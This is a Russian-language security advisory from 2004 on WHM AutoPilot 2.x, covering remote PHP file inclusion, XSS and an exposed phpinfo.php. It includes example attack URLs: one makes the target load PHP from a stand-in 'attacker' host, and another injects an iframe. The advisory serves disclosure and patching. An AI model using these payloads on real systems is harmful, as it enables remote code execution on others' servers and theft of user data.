Дата публикации: | 29.12.2004 |
Всего просмотров: | 2168 |
Опасность: | Высокая |
Наличие исправления: | Да |
Количество уязвимостей: | 1 |
CVE ID: |
CVE-2004-1420 CVE-2004-1421 CVE-2004-1422 |
Вектор эксплуатации: | Удаленная |
Воздействие: |
Межсайтовый скриптинг Раскрытие системных данных Компрометация системы |
CWE ID: | Нет данных |
Наличие эксплоита: | Нет данных |
Уязвимые продукты: | WHM AutoPilot 2.x |
Уязвимые версии: WHM AutoPilot
Описание: Уязвимость существует из-за некорректной обработки входных данных в некоторых переменных. Удаленный атакующий может выполнить произвольный php сценарий на уязвимой системе. Примеры:
http://[target]/path/inc/header.php/step_one.php?server_inc=http://attacker/step_one_tables.php Удаленный атакующий может произвести XSS атаку и получить доступ к важным данным пользователей. Уязвимость существует из-за некорректной обработки входных данных в некоторых переменных. Примеры:
http://[target]/path/inc/header.php?site_title=%3C/title%3E%3Ciframe%3E В конфигурации по умолчанию на системе после установки WHM AutoPilot присутствует файл phpinfo.php. Удаленный атакующий может получить информацию о системе. URL производителя: www.whmautopilot.com/index.php Решение: Установите обновление |
|
Ссылки: | Vulnerabilities In WHM Autopilot |